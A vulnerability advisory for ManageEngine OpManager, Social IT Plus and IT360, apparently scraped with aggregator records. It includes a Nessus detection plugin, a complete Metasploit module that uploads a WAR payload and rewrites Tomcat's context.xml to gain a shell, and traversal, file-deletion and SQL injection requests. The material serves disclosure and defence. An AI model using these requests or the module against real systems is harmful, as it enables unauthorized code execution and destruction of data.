Hi,
This is the fifth part of the ManageOwnage series. For previous parts, see:
http://seclists.org/fulldisclosure/2014/Aug/55
http://seclists.org/fulldisclosure/2014/Aug/75
http://seclists.org/fulldisclosure/2014/Aug/88
http://seclists.org/fulldisclosure/2014/Sep/1
This time we have a file upload with directory traversal as well as an
arbitrary file deletion vulnerability. The file upload can be abused
to deliver a WAR payload in the Tomcat webapps directory, which will
deploy a malicious Servlet allowing the attacker to execute arbitrary
code.
Details are below, and the usual Metasploit module has been submitted
and should be available soon (see pull request
https://github.com/rapid7/metasploit-framework/pull/3903).
>> Multiple vulnerabilities in ManageEngine OpManager, Social IT Plus and IT360
>> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security
==========================================================================
>> Background on the affected products:
"ManageEngine OpManager is a network and data center infrastructure
management software that helps large enterprises, service providers
and SMEs manage their data centers and IT infrastructure efficiently
and cost effectively. Automated workflows, intelligent alerting
engines, configurable discovery rules, and extendable templates enable
IT teams to setup a 24x7 monitoring system within hours of
installation."
"Social IT Plus offers a cascading wall that helps IT folks to start
discussions, share articles and videos easily and quickly. Other team
members can access it and post comments and likes on the fly."
"Managing mission critical business applications is now made easy
through ManageEngine IT360. With agentless monitoring methodology,
monitor your applications, servers and databases with ease. Agentless
monitoring of your business applications enables you high ROI and low
TOC. With integrated network monitoring and bandwidth utilization,
quickly troubleshoot any performance related issue with your network
and assign issues automatically with ITIL based ServiceDesk
integration."
>> Technical details:
#1
Vulnerability: Remote code execution via WAR file upload
Constraints: unauthenticated on OpManager and Social IT; authenticated in IT360
a)
CVE-2014-6034
POST /servlet/com.me.opmanager.extranet.remote.communication.fw.fe.FileCollector?regionID=../../../tomcat/webapps&FILENAME=payload.war
Affected versions: OpManager v8.8 to v11.3; Social IT Plus v11.0;
IT360 v? to v10.4
A Metasploit module that exploits this vulnerability has been released.
b)
CVE-2014-6035
POST /servlets/FileCollector?AGENTKEY=123&FILENAME=../../../tomcat/webapps/warfile.war
Affected versions: OpManager v? to v11.3
#2
Vulnerability: Arbitrary file deletion
CVE-2014-6036
Constraints: unauthenticated on OpManager and Social IT; authenticated in IT360
Affected versions: OpManager v? to v11.3; Social IT Plus v11.0; IT360
v? to v10.4
POST /servlets/multipartRequest?customIcon=delete&fileName=../../../../boot.ini
>> Fix:
Upgrade to OpManager 11.3, then install the patch in
https://support.zoho.com/portal/manageengine/helpcenter/articles/servlet-vulnerability-fix
This patch can be applied to all the applications but only for the
latest version of each (OpManager 11.3, Social IT 11.0, IT360 10.4).
ManageEngine have indicated that the soon to be released OpManager
version 11.4 might not have the fix as the release is almost ready.
They are planning to include the fix in OpManager version 11.5 which
should be released sometime in late November or December 2014. No
indication was given for when fixed versions of IT360 and Social IT
Plus will be released.
A copy of the advisory above can be found at my repo:
https://raw.githubusercontent.com/pedrib/PoC/master/ManageEngine/me_opmanager_socialit_it360.txt
Regards,
Pedro
{"id": "SECURITYVULNS:DOC:31197", "bulletinFamily": "software", "title": "[The ManageOwnage Series, part V]: RCE / file upload / arbitrary file deletion in OpManager, Social IT and IT360", "description": "\r\n\r\nHi,\r\n\r\nThis is the fifth part of the ManageOwnage series. For previous parts, see:\r\nhttp://seclists.org/fulldisclosure/2014/Aug/55\r\nhttp://seclists.org/fulldisclosure/2014/Aug/75\r\nhttp://seclists.org/fulldisclosure/2014/Aug/88\r\nhttp://seclists.org/fulldisclosure/2014/Sep/1\r\n\r\nThis time we have a file upload with directory traversal as well as an\r\narbitrary file deletion vulnerability. The file upload can be abused\r\nto deliver a WAR payload in the Tomcat webapps directory, which will\r\ndeploy a malicious Servlet allowing the attacker to execute arbitrary\r\ncode.\r\n\r\nDetails are below, and the usual Metasploit module has been submitted\r\nand should be available soon (see pull request\r\nhttps://github.com/rapid7/metasploit-framework/pull/3903).\r\n\r\n\r\n>> Multiple vulnerabilities in ManageEngine OpManager, Social IT Plus and IT360\r\n>> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security\r\n==========================================================================\r\n\r\n>> Background on the affected products:\r\n"ManageEngine OpManager is a network and data center infrastructure\r\nmanagement software that helps large enterprises, service providers\r\nand SMEs manage their data centers and IT infrastructure efficiently\r\nand cost effectively. Automated workflows, intelligent alerting\r\nengines, configurable discovery rules, and extendable templates enable\r\nIT teams to setup a 24x7 monitoring system within hours of\r\ninstallation."\r\n\r\n"Social IT Plus offers a cascading wall that helps IT folks to start\r\ndiscussions, share articles and videos easily and quickly. Other team\r\nmembers can access it and post comments and likes on the fly."\r\n\r\n"Managing mission critical business applications is now made easy\r\nthrough ManageEngine IT360. With agentless monitoring methodology,\r\nmonitor your applications, servers and databases with ease. Agentless\r\nmonitoring of your business applications enables you high ROI and low\r\nTOC. With integrated network monitoring and bandwidth utilization,\r\nquickly troubleshoot any performance related issue with your network\r\nand assign issues automatically with ITIL based ServiceDesk\r\nintegration."\r\n\r\n\r\n>> Technical details:\r\n#1\r\nVulnerability: Remote code execution via WAR file upload\r\nConstraints: unauthenticated on OpManager and Social IT; authenticated in IT360\r\n\r\na)\r\nCVE-2014-6034\r\nPOST /servlet/com.me.opmanager.extranet.remote.communication.fw.fe.FileCollector?regionID=../../../tomcat/webapps&FILENAME=payload.war\r\nAffected versions: OpManager v8.8 to v11.3; Social IT Plus v11.0;\r\nIT360 v? to v10.4\r\nA Metasploit module that exploits this vulnerability has been released.\r\n\r\nb)\r\nCVE-2014-6035\r\nPOST /servlets/FileCollector?AGENTKEY=123&FILENAME=../../../tomcat/webapps/warfile.war\r\nAffected versions: OpManager v? to v11.3\r\n\r\n\r\n#2\r\nVulnerability: Arbitrary file deletion\r\nCVE-2014-6036\r\nConstraints: unauthenticated on OpManager and Social IT; authenticated in IT360\r\nAffected versions: OpManager v? to v11.3; Social IT Plus v11.0; IT360\r\nv? to v10.4\r\n\r\nPOST /servlets/multipartRequest?customIcon=delete&fileName=../../../../boot.ini\r\n\r\n\r\n>> Fix:\r\nUpgrade to OpManager 11.3, then install the patch in\r\nhttps://support.zoho.com/portal/manageengine/helpcenter/articles/servlet-vulnerability-fix\r\nThis patch can be applied to all the applications but only for the\r\nlatest version of each (OpManager 11.3, Social IT 11.0, IT360 10.4).\r\nManageEngine have indicated that the soon to be released OpManager\r\nversion 11.4 might not have the fix as the release is almost ready.\r\nThey are planning to include the fix in OpManager version 11.5 which\r\nshould be released sometime in late November or December 2014. No\r\nindication was given for when fixed versions of IT360 and Social IT\r\nPlus will be released.\r\n\r\nA copy of the advisory above can be found at my repo:\r\nhttps://raw.githubusercontent.com/pedrib/PoC/master/ManageEngine/me_opmanager_socialit_it360.txt\r\n\r\nRegards,\r\nPedro\r\n\r\n", "published": "2014-10-14T00:00:00", "modified": "2014-10-14T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31197", "reporter": "Securityvulns", "references": [], "cvelist": ["CVE-2014-6035", "CVE-2014-6034", "CVE-2014-6036"], "type": "securityvulns", "lastseen": "2018-08-31T11:10:54", "edition": 1, "viewCount": 21, "enchantments": {"score": {"value": 1.0, "vector": "NONE"}, "dependencies": {"references": [{"type": "checkpoint_advisories", "idList": ["CPAI-2014-1895", "CPAI-2014-1905", "CPAI-2014-1916"]}, {"type": "cve", "idList": ["CVE-2014-6034", "CVE-2014-6035", "CVE-2014-6036"]}, {"type": "dsquare", "idList": ["E-407", "E-410"]}, {"type": "exploitdb", "idList": ["EDB-ID:43896"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:C6C0E52E4741BC06145EA77E364C27BF"]}, {"type": "nessus", "idList": ["MANAGEENGINE_OPMANAGER_11300_FILE_UPLOAD_EXPLOIT.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310805103"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:128474", "PACKETSTORM:128477"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:14008"]}, {"type": "zdi", "idList": ["ZDI-15-113", "ZDI-15-142", "ZDI-15-143"]}, {"type": "zdt", "idList": ["1337DAY-ID-22712", "1337DAY-ID-29642"]}]}, "backreferences": {"references": [{"type": "checkpoint_advisories", "idList": ["CPAI-2014-1916"]}, {"type": "cve", "idList": ["CVE-2014-6034", "CVE-2014-6035", "CVE-2014-6036"]}, {"type": "dsquare", "idList": ["E-407"]}, {"type": "exploitdb", "idList": ["EDB-ID:43896"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/MULTI/HTTP/OPMANAGER_SOCIALIT_FILE_UPLOAD"]}, {"type": "nessus", "idList": ["MANAGEENGINE_OPMANAGER_11300_FILE_UPLOAD_EXPLOIT.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310805103"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:128474"]}, {"type": "zdi", "idList": ["ZDI-15-113", "ZDI-15-142"]}, {"type": "zdt", "idList": ["1337DAY-ID-29642"]}]}, "exploitation": null, "vulnersScore": 1.0}, "affectedSoftware": [], "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1659978038, "score": 1659980168}, "_internal": {"score_hash": "f84ea1e1d64596581cc5f565660ddc45"}}
{"nessus": [{"lastseen": "2021-08-19T12:46:50", "description": "The version of ManageEngine OpManager installed on the remote host is affected by multiple directory traversal vulnerabilities :\n\n - The FileCollector servlet fails to properly sanitize user-supplied input to the 'regionID' and 'FILENAME' parameters when uploading files. This allows a remote attacker and authenticated users to write to and execute arbitrary WAR files.\n (CVE-2014-6034, CVE-2014-6035)\n\n - The multipartRequest servlet fails to properly sanitize user-supplied input to the 'fileName' parameter. This allows a remote attacker and authenticated users to delete arbitrary files. (CVE-2014-6036)\n\nNote that Nessus has tested for the two directory traversal and file upload vulnerabilities; however, it did not test for the arbitrary code execution or file deletion vulnerabilities. If a file can be uploaded via the directory traversal attack, then the execution and deletion flaws are likely exploitable as well.", "cvss3": {"score": null, "vector": null}, "published": "2015-02-16T00:00:00", "type": "nessus", "title": "ManageEngine OpManager Multiple Directory Traversal Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6034", "CVE-2014-6035", "CVE-2014-6036"], "modified": "2021-01-19T00:00:00", "cpe": ["cpe:/a:zohocorp:manageengine_opmanager"], "id": "MANAGEENGINE_OPMANAGER_11300_FILE_UPLOAD_EXPLOIT.NASL", "href": "https://www.tenable.com/plugins/nessus/81378", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(81378);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2014-6034\", \"CVE-2014-6035\", \"CVE-2014-6036\");\n script_bugtraq_id(70167, 70169, 70172);\n\n script_name(english:\"ManageEngine OpManager Multiple Directory Traversal Vulnerabilities\");\n script_summary(english:\"Attempts to upload a file.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a Java web application that is affected\nby multiple directory traversal vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of ManageEngine OpManager installed on the remote host is\naffected by multiple directory traversal vulnerabilities :\n\n - The FileCollector servlet fails to properly sanitize\n user-supplied input to the 'regionID' and 'FILENAME'\n parameters when uploading files. This allows a remote\n attacker and authenticated users to write to and\n execute arbitrary WAR files.\n (CVE-2014-6034, CVE-2014-6035)\n\n - The multipartRequest servlet fails to properly sanitize\n user-supplied input to the 'fileName' parameter. This\n allows a remote attacker and authenticated users to\n delete arbitrary files. (CVE-2014-6036)\n\nNote that Nessus has tested for the two directory traversal and file\nupload vulnerabilities; however, it did not test for the arbitrary\ncode execution or file deletion vulnerabilities. If a file can be\nuploaded via the directory traversal attack, then the execution and\ndeletion flaws are likely exploitable as well.\");\n # https://pitstop.manageengine.com/portal/kb/articles/servlet-vulnerability-fix\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?d44b4150\");\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/fulldisclosure/2014/Sep/110\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to ManageEngine OpManager version 11.3 and apply the\nvendor-supplied patch.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-6035\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"ManageEngine OpManager FileCollector Servlet File Upload\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'ManageEngine OpManager and Social IT Arbitrary File Upload');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/02/16\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:zohocorp:manageengine_opmanager\");\n script_end_attributes();\n\n script_category(ACT_DESTRUCTIVE_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"manageengine_opmanager_detect.nbin\");\n script_require_keys(\"installed_sw/ManageEngine OpManager\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"install_func.inc\");\n\napp = \"ManageEngine OpManager\";\nget_install_count(app_name:app, exit_if_zero:TRUE);\n\nport = get_http_port(default:80);\n\ninstall = get_single_install(\n app_name : app,\n port : port,\n exit_if_unknown_ver : TRUE\n);\n\ndir = install[\"path\"];\ninstall_url = build_url(port:port, qs:dir);\nunique = rand_str(length:10);\nfile = \"nessus_delete_this_file_\" + unique + \".css\";\n\n# Try to upload a CSS file\n# While we don't try to upload a WAR file directly, if we can\n# upload a CSS file we could use the same request to upload a WAR\n# file which would allow for remote code execution\npostdata = 'Nessus Check: '+unique;\n\n# Couple of vectors to test\nvectors = make_list(\n \"servlets/FileCollector?AGENTKEY=123&FILENAME=../../../webclient/common/css/\"+file,\n \"servlets/FileCollector?AGENTKEY=123&FILENAME=..\\\\..\\\\..\\\\webclient\\\\common\\\\css\\\\\"+file,\n \"servlet/com.me.opmanager.extranet.remote.communication.fw.fe.FileCollector?regionID=../../../webclient/common/css&FILENAME=\"+file,\n \"servlet/com.me.opmanager.extranet.remote.communication.fw.fe.FileCollector?regionID=..\\\\..\\\\..\\\\webclient\\\\common\\\\css&FILENAME=\"+file\n);\n\nuploaded = FALSE;\nexecuted = FALSE;\nvecurl = \"\";\nforeach vector (vectors)\n{\n\n res = http_send_recv3(\n port : port,\n method : \"POST\",\n item : dir+vector,\n data : postdata,\n content_type : \"text/html\",\n exit_on_fail : TRUE\n );\n exp_request = http_last_sent_request();\n\n # Try and access our uploaded file\n res = http_send_recv3(\n method : \"GET\",\n port : port,\n item : dir + \"webclient/common/css/\" +file,\n exit_on_fail : TRUE\n );\n\n # Only need to upload one file\n if(\"Nessus Check: \"+unique >< res[2])\n {\n uploaded = TRUE;\n vecurl = vector;\n break;\n }\n}\n\nif (uploaded)\n{\n security_report_v4(\n port : port,\n severity : SECURITY_HOLE,\n file : dir+\"webclient/common/css/\"+file,\n line_limit : 10,\n request : make_list(exp_request),\n output : chomp(res[2]),\n attach_type : 'text/plain'\n );\n} else audit(AUDIT_WEB_APP_NOT_AFFECTED, app, install_url);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2016-12-05T22:23:53", "description": "", "cvss3": {}, "published": "2014-09-29T00:00:00", "type": "packetstorm", "title": "ManageEngine Code Execution / File Deletion", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-6035", "CVE-2014-6034", "CVE-2014-6036"], "modified": "2014-09-29T00:00:00", "id": "PACKETSTORM:128474", "href": "https://packetstormsecurity.com/files/128474/ManageEngine-Code-Execution-File-Deletion.html", "sourceData": "`Hi, \n \nThis is the fifth part of the ManageOwnage series. For previous parts, see: \nhttp://seclists.org/fulldisclosure/2014/Aug/55 \nhttp://seclists.org/fulldisclosure/2014/Aug/75 \nhttp://seclists.org/fulldisclosure/2014/Aug/88 \nhttp://seclists.org/fulldisclosure/2014/Sep/1 \n \nThis time we have a file upload with directory traversal as well as an \narbitrary file deletion vulnerability. The file upload can be abused \nto deliver a WAR payload in the Tomcat webapps directory, which will \ndeploy a malicious Servlet allowing the attacker to execute arbitrary \ncode. \n \nDetails are below, and the usual Metasploit module has been submitted \nand should be available soon (see pull request \nhttps://github.com/rapid7/metasploit-framework/pull/3903). \n \n \n>> Multiple vulnerabilities in ManageEngine OpManager, Social IT Plus and IT360 \n>> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security \n========================================================================== \n \n>> Background on the affected products: \n\"ManageEngine OpManager is a network and data center infrastructure \nmanagement software that helps large enterprises, service providers \nand SMEs manage their data centers and IT infrastructure efficiently \nand cost effectively. Automated workflows, intelligent alerting \nengines, configurable discovery rules, and extendable templates enable \nIT teams to setup a 24x7 monitoring system within hours of \ninstallation.\" \n \n\"Social IT Plus offers a cascading wall that helps IT folks to start \ndiscussions, share articles and videos easily and quickly. Other team \nmembers can access it and post comments and likes on the fly.\" \n \n\"Managing mission critical business applications is now made easy \nthrough ManageEngine IT360. With agentless monitoring methodology, \nmonitor your applications, servers and databases with ease. Agentless \nmonitoring of your business applications enables you high ROI and low \nTOC. With integrated network monitoring and bandwidth utilization, \nquickly troubleshoot any performance related issue with your network \nand assign issues automatically with ITIL based ServiceDesk \nintegration.\" \n \n \n>> Technical details: \n#1 \nVulnerability: Remote code execution via WAR file upload \nConstraints: unauthenticated on OpManager and Social IT; authenticated in IT360 \n \na) \nCVE-2014-6034 \nPOST /servlet/com.me.opmanager.extranet.remote.communication.fw.fe.FileCollector?regionID=../../../tomcat/webapps&FILENAME=payload.war \nAffected versions: OpManager v8.8 to v11.3; Social IT Plus v11.0; \nIT360 v? to v10.4 \nA Metasploit module that exploits this vulnerability has been released. \n \nb) \nCVE-2014-6035 \nPOST /servlets/FileCollector?AGENTKEY=123&FILENAME=../../../tomcat/webapps/warfile.war \nAffected versions: OpManager v? to v11.3 \n \n \n#2 \nVulnerability: Arbitrary file deletion \nCVE-2014-6036 \nConstraints: unauthenticated on OpManager and Social IT; authenticated in IT360 \nAffected versions: OpManager v? to v11.3; Social IT Plus v11.0; IT360 \nv? to v10.4 \n \nPOST /servlets/multipartRequest?customIcon=delete&fileName=../../../../boot.ini \n \n \n>> Fix: \nUpgrade to OpManager 11.3, then install the patch in \nhttps://support.zoho.com/portal/manageengine/helpcenter/articles/servlet-vulnerability-fix \nThis patch can be applied to all the applications but only for the \nlatest version of each (OpManager 11.3, Social IT 11.0, IT360 10.4). \nManageEngine have indicated that the soon to be released OpManager \nversion 11.4 might not have the fix as the release is almost ready. \nThey are planning to include the fix in OpManager version 11.5 which \nshould be released sometime in late November or December 2014. No \nindication was given for when fixed versions of IT360 and Social IT \nPlus will be released. \n \nA copy of the advisory above can be found at my repo: \nhttps://raw.githubusercontent.com/pedrib/PoC/master/ManageEngine/me_opmanager_socialit_it360.txt \n \nRegards, \nPedro \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/128474/meopmanager-execlfi.txt", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-12-05T22:25:11", "description": "", "cvss3": {}, "published": "2014-09-29T00:00:00", "type": "packetstorm", "title": "ManageEngine OpManager / Social IT Arbitrary File Upload", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-6034"], "modified": "2014-09-29T00:00:00", "id": "PACKETSTORM:128477", "href": "https://packetstormsecurity.com/files/128477/ManageEngine-OpManager-Social-IT-Arbitrary-File-Upload.html", "sourceData": "`## \n# This module requires Metasploit: http//metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::FileDropper \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'ManageEngine OpManager / Social IT Arbitrary File Upload', \n'Description' => %q{ \nThis module exploits a file upload vulnerability in ManageEngine OpManager and Social IT. \nThe vulnerability exists in the FileCollector servlet which accepts unauthenticated \nfile uploads. This module has been tested successfully on OpManager v8.8 - v11.3 and on \nversion 11.0 of SocialIT for Windows and Linux. \n}, \n'Author' => \n[ \n'Pedro Ribeiro <pedrib[at]gmail.com>', # Vulnerability Discovery and Metasploit module \n], \n'License' => MSF_LICENSE, \n'References' => \n[ \n[ 'CVE', '2014-6034' ], \n[ 'OSVDB', '112276' ], \n[ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/ManageEngine/me_opmanager_socialit_it360.txt' ], \n[ 'URL', 'http://seclists.org/fulldisclosure/2014/Sep/110' ] \n], \n'Privileged' => true, \n'Platform' => 'java', \n'Arch' => ARCH_JAVA, \n'Targets' => \n[ \n[ 'OpManager v8.8 - v11.3 / Social IT Plus 11.0 Java Universal', { } ] \n], \n'DefaultTarget' => 0, \n'DisclosureDate' => 'Sep 27 2014')) \n \nregister_options( \n[ \nOpt::RPORT(80), \nOptInt.new('SLEEP', \n[true, 'Seconds to sleep while we wait for WAR deployment', 15]), \n], self.class) \nend \n \ndef check \nres = send_request_cgi({ \n'uri' => normalize_uri(\"/servlet/com.me.opmanager.extranet.remote.communication.fw.fe.FileCollector\"), \n'method' => 'GET' \n}) \n \n# A GET request on this servlet returns \"405 Method not allowed\" \nif res and res.code == 405 \nreturn Exploit::CheckCode::Detected \nend \n \nreturn Exploit::CheckCode::Safe \nend \n \n \ndef upload_war_and_exec(try_again, app_base) \ntomcat_path = '../../../tomcat/' \nservlet_path = '/servlet/com.me.opmanager.extranet.remote.communication.fw.fe.FileCollector' \n \nif try_again \n# We failed to obtain a shell. Either the target is not vulnerable or the Tomcat configuration \n# does not allow us to deploy WARs. Fix that by uploading a new context.xml file. \n# The file we are uploading has the same content apart from privileged=\"false\" and lots of XML comments. \n# After replacing the context.xml file let's upload the WAR again. \nprint_status(\"#{peer} - Replacing Tomcat context file\") \nsend_request_cgi({ \n'uri' => normalize_uri(servlet_path), \n'method' => 'POST', \n'data' => %q{<?xml version='1.0' encoding='utf-8'?><Context privileged=\"true\"><WatchedResource>WEB-INF/web.xml</WatchedResource></Context>}, \n'ctype' => 'application/xml', \n'vars_get' => { \n'regionID' => tomcat_path + \"conf\", \n'FILENAME' => \"context.xml\" \n} \n}) \nelse \n# We need to create the upload directories before our first attempt to upload the WAR. \nprint_status(\"#{peer} - Creating upload directories\") \nbogus_file = rand_text_alphanumeric(4 + rand(32 - 4)) \nsend_request_cgi({ \n'uri' => normalize_uri(servlet_path), \n'method' => 'POST', \n'data' => rand_text_alphanumeric(4 + rand(32 - 4)), \n'ctype' => 'application/xml', \n'vars_get' => { \n'regionID' => \"\", \n'FILENAME' => bogus_file \n} \n}) \nregister_files_for_cleanup(\"state/archivedata/zip/\" + bogus_file) \nend \n \nwar_payload = payload.encoded_war({ :app_name => app_base }).to_s \n \nprint_status(\"#{peer} - Uploading WAR file...\") \nres = send_request_cgi({ \n'uri' => normalize_uri(servlet_path), \n'method' => 'POST', \n'data' => war_payload, \n'ctype' => 'application/octet-stream', \n'vars_get' => { \n'regionID' => tomcat_path + \"webapps\", \n'FILENAME' => app_base + \".war\" \n} \n}) \n \n# The server either returns a 500 error or a 200 OK when the upload is successful. \nif res and (res.code == 500 or res.code == 200) \nprint_status(\"#{peer} - Upload appears to have been successful, waiting \" + datastore['SLEEP'].to_s + \n\" seconds for deployment\") \nsleep(datastore['SLEEP']) \nelse \nfail_with(Exploit::Failure::Unknown, \"#{peer} - WAR upload failed\") \nend \n \nprint_status(\"#{peer} - Executing payload, wait for session...\") \nsend_request_cgi({ \n'uri' => normalize_uri(app_base, Rex::Text.rand_text_alpha(rand(8)+8)), \n'method' => 'GET' \n}) \nend \n \n \ndef exploit \napp_base = rand_text_alphanumeric(4 + rand(32 - 4)) \n \nupload_war_and_exec(false, app_base) \nregister_files_for_cleanup(\"tomcat/webapps/\" + \"#{app_base}.war\") \n \nsleep_counter = 0 \nwhile not session_created? \nif sleep_counter == datastore['SLEEP'] \nprint_error(\"#{peer} - Failed to get a shell, let's try one more time\") \nupload_war_and_exec(true, app_base) \nreturn \nend \n \nsleep(1) \nsleep_counter += 1 \nend \nend \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/128477/opmanager_socialit_file_upload.rb.txt", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:30", "description": "\nManageEngine OpManager Social IT Plus IT360 - Multiple Vulnerabilities", "edition": 2, "cvss3": {}, "published": "2014-11-09T00:00:00", "title": "ManageEngine OpManager Social IT Plus IT360 - Multiple Vulnerabilities", "type": "exploitpack", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6035", "CVE-2014-6034", "CVE-2014-7866", "CVE-2014-7868", "CVE-2014-6036"], "modified": "2014-11-09T00:00:00", "id": "EXPLOITPACK:C6C0E52E4741BC06145EA77E364C27BF", "href": "", "sourceData": ">> Multiple vulnerabilities in ManageEngine OpManager, Social IT Plus and IT360\n>> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security\n==========================================================================\nDisclosure: 27/09/2014 (#1 and #2), 09/11/2014 (#3 and #4) / Last updated: 09/11/2014\n\n>> Background on the affected products:\n\"ManageEngine OpManager is a network and data center infrastructure management software that helps large enterprises, service providers and SMEs manage their data centers and IT infrastructure efficiently and cost effectively. Automated workflows, intelligent alerting engines, configurable discovery rules, and extendable templates enable IT teams to setup a 24x7 monitoring system within hours of installation.\"\n\n\"Social IT Plus offers a cascading wall that helps IT folks to start discussions, share articles and videos easily and quickly. Other team members can access it and post comments and likes on the fly.\"\n\n\"Managing mission critical business applications is now made easy through ManageEngine IT360. With agentless monitoring methodology, monitor your applications, servers and databases with ease. Agentless monitoring of your business applications enables you high ROI and low TOC. With integrated network monitoring and bandwidth utilization, quickly troubleshoot any performance related issue with your network and assign issues automatically with ITIL based ServiceDesk integration.\"\n\n\n>> Technical details:\n#1\nVulnerability: Remote code execution via WAR file upload\nConstraints: unauthenticated on OpManager and Social IT; authenticated in IT360\n\na)\nCVE-2014-6034\nPOST /servlet/com.me.opmanager.extranet.remote.communication.fw.fe.FileCollector?regionID=../../../tomcat/webapps&FILENAME=payload.war\n<... WAR file payload ...>\nAffected versions: OpManager v8.8 to v11.4; Social IT Plus v11.0; IT360 v? to v10.4\nA Metasploit module that exploits this vulnerability has been released.\n\nb)\nCVE-2014-6035\nPOST /servlets/FileCollector?AGENTKEY=123&FILENAME=../../../tomcat/webapps/warfile.war\n<... WAR file payload ...>\n\nAffected versions: OpManager v? to v11.4\n\n\n#2\nVulnerability: Arbitrary file deletion\nCVE-2014-6036\nConstraints: unauthenticated on OpManager and Social IT; authenticated in IT360\nAffected versions: OpManager v? to v11.4; Social IT Plus v11.0; IT360 v? to v10.3/10.4\n\nPOST /servlets/multipartRequest?customIcon=delete&fileName=../../../../boot.ini\n\n\n#3\nVulnerability: Remote code execution via file upload\nCVE-2014-7866\nConstraints: unauthenticated on OpManager and Social IT; authenticated in IT360\n\na)\nPOST /servlet/MigrateLEEData?fileName=../tomcat/webapps/warfile.war%00\n<... WAR file payload ...>\n\nAffected versions: Unknown, at least OpManager v8 build 88XX to 11.4; IT360 10.3/10.4; Social IT 11.0\n\nb)\nPOST /servlet/MigrateCentralData?operation=downloadFileFromProbe&zipFileName=../tomcat/webapps/warfile.war%00\n<... WAR file payload ...>\n\nAffected versions: Unknown, at least OpManager v8 build 88XX to 11.4; IT360 10.3/10.4; Social IT 11.0\n\n\n#4\nVulnerability: Blind SQL injection\nCVE-2014-7868\nConstraints: unauthenticated on OpManager and Social IT; authenticated in IT360\n\na)\nPOST /servlet/APMBVHandler?OPERATION_TYPE=Delete&OPM_BVNAME=[SQLi]\nPOST /servlet/APMBVHandler?OPERATION_TYPE=Delete&OPM_BVNAME=aaa'%3bcreate+table+pulicia+(bolas+text)%3b--+\nAffected versions: Unknown, at least the current versions (OpManager 11.3/11.4; IT360 10.3/10.4; Social IT 